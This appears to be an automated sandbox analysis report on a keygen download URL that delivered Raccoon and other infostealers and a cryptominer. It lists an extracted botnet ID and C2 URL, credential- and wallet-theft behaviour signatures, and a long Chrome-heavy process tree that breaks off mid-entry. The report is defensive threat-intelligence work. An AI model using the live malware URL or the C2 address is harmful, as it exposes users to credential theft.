Analysis

  • max time kernel
    1791s
  • max time network
    1794s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    19-04-2021 12:53

General

  • Target

    https://keygenit.com/d/879505fab610o2194510.html

  • Sample

    210419-ftya1gkrwn

Malware Config

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 30 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 17 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:336
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2808
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2796
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2720
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2556
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2544
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1956
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1420
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1244
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                    1⤵
                    • Modifies registry class
                    PID:1236
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1076
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:396
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/879505fab610o2194510.html
                        1⤵
                        • Enumerates system info in registry
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of WriteProcessMemory
                        PID:808
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff9d0da4f50,0x7ff9d0da4f60,0x7ff9d0da4f70
                          2⤵
                            PID:1636
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1536 /prefetch:2
                            2⤵
                              PID:3820
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1780 /prefetch:8
                              2⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:636
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2272 /prefetch:8
                              2⤵
                                PID:2252
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2260 /prefetch:1
                                2⤵
                                  PID:3424
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2840 /prefetch:1
                                  2⤵
                                    PID:2208
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2492 /prefetch:1
                                    2⤵
                                      PID:2216
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
                                      2⤵
                                        PID:2948
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:1
                                        2⤵
                                          PID:2164
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
                                          2⤵
                                            PID:2180
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4784 /prefetch:8
                                            2⤵
                                              PID:4188
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5232 /prefetch:8
                                              2⤵
                                                PID:4556
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3636 /prefetch:8
                                                2⤵
                                                  PID:4612
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5456 /prefetch:8
                                                  2⤵
                                                    PID:4664
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5236 /prefetch:8
                                                    2⤵
                                                      PID:4700
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5260 /prefetch:8
                                                      2⤵
                                                        PID:4736
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5612 /prefetch:8
                                                        2⤵
                                                          PID:4772
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5636 /prefetch:8
                                                          2⤵
                                                            PID:4808
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5768 /prefetch:8
                                                            2⤵
                                                              PID:4844
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5616 /prefetch:8
                                                              2⤵
                                                                PID:4880
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5776 /prefetch:8
                                                                2⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:4916
                                                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                2⤵
                                                                  PID:4952
                                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff68942a890,0x7ff68942a8a0,0x7ff68942a8b0
                                                                    3⤵
                                                                      PID:5000
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8
                                                                    2⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:5056
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5284 /prefetch:8
                                                                    2⤵
                                                                      PID:5068
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5292 /prefetch:8
                                                                      2⤵
                                                                        PID:2924
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5420 /prefetch:8
                                                                        2⤵
                                                                          PID:4072
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5536 /prefetch:8
                                                                          2⤵
                                                                            PID:4212
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5452 /prefetch:8
                                                                            2⤵
                                                                              PID:4128
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5472 /prefetch:8
                                                                              2⤵
                                                                                PID:2072
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5260 /prefetch:8
                                                                                2⤵
                                                                                  PID:4348
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5560 /prefetch:8
                                                                                  2⤵
                                                                                    PID:4456
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5744 /prefetch:8
                                                                                    2⤵
                                                                                      PID:4564
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5736 /prefetch:8
                                                                                      2⤵
                                                                                        PID:4596
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3636 /prefetch:8
                                                                                        2⤵
                                                                                          PID:4704
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6776 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4776
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6908 /prefetch:8
                                                                                            2⤵
                                                                                              PID:4800
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5576 /prefetch:8
                                                                                              2⤵
                                                                                                PID:4824
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7200 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:4892
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7300 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:4960
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7456 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:4920
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7588 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:4976
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7712 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:2228
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7844 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:3948
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7976 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:1040
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8112 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:4612
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8092 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:4720
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8356 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:1000
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8380 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:4512
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8392 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:4836
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8636 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:4840
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6364 /prefetch:8
                                                                                                                          2⤵
                                                                                                                            PID:4972
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4104 /prefetch:1
                                                                                                                            2⤵
                                                                                                                              PID:4172
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1
                                                                                                                              2⤵
                                                                                                                                PID:4632
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4212 /prefetch:8
                                                                                                                                2⤵
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:2072
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
                                                                                                                                2⤵
                                                                                                                                  PID:4824
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8348 /prefetch:8
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:4660
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:4580
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2284 /prefetch:8
                                                                                                                                  2⤵
                                                                                                                                    PID:4916
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:8
                                                                                                                                    2⤵
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:4352
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2364 /prefetch:8
                                                                                                                                    2⤵
                                                                                                                                      PID:4232
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
